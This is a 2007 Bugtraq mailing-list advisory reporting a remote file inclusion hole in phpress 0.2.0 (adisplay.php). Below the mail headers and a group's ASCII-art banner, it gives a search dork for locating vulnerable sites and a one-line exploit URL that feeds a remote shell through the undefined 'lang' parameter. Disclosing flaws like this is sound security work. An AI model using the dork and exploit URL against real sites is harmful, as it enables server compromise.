phpress 0.2.0 (adisplay.php) Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: phpress 0.2.0 (adisplay.php) Remote File Inclusion
- From: naxx <cerbelum@xxxxxxxxx>
- Date: Thu, 23 Aug 2007 01:28:12 +0200
- Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:mime-version:content-transfer-encoding:message-id:content-type:to:from:subject:date:x-mailer; b=UFap/4wzPJeusvfIdvjyEjKZSKkQe6qloVUbUQOHttfkpZOdkkgHIik3iiqhiI9737qsUnkW/VgeawxWV7vlCZNwnTwsQot4JKj1eJbsdUQC72H6Egc/c5xHHiIi0OoXRgK4oiMumjQ87L1jyo/evvprwJuGRRyDqknV9BGntYQ=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:mime-version:content-transfer-encoding:message-id:content-type:to:from:subject:date:x-mailer; b=CS1D09KDLoAxBpuv25KAuVPpAsZGkwYNLmp5wXCksLbK6S4/nJgtWqUFDTfGsQ3/XS3K8r5WH8DJbarA4RuebbZHLTv49g8utK9Pmn4QEjdoaYM/tSGmNmiBR8OdrgKeMUJ15hpoTBLdNY7sUR9RGCMadgnkN05b7d1OXVdYQ+M=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
:::::::::::::::::::::::::::::::::::::::::::::::::::.....................
..
::| \ | (_) | \ | | / ____|
::| \| |_ ___ ___ | \| | __ _ _ __ ___ ___ | | _ __
_____ __
::| . ` | |/ __/ _ \ | . ` |/ _` | '_ ` _ \ / _ \ | | | '__/ _ \
\ /\ / /
::| |\ | | (_| __/ | |\ | (_| | | | | | | __/ | |____| | | __/\
V V /
::|_| \_|_|\___\___| |_| \_|\__,_|_| |_| |_|\___| \_____|_| \___|
\_/\_/
:::::::::::::::::::::::::::::We got the nicest name in the security
scene!
::::::::Info::.
::Script: phpress
::Version: 0.2.0
::Homepage:http://sourceforge.net/projects/phpress/
::
:::::::::Details::.
::Type: Remote_File_Inclusion
::Dork: allinurl:/phpress/
::Exploit: http://host/phpress/adisplay.php?lang=shell
::
::
::Variable lang is not defined
::
::::::::::::::::::::::::::::::::.
:::::::::::Additional_Information::.
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.
::Contact: cerbelum@xxxxxxxxx
::Website: none yet
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::.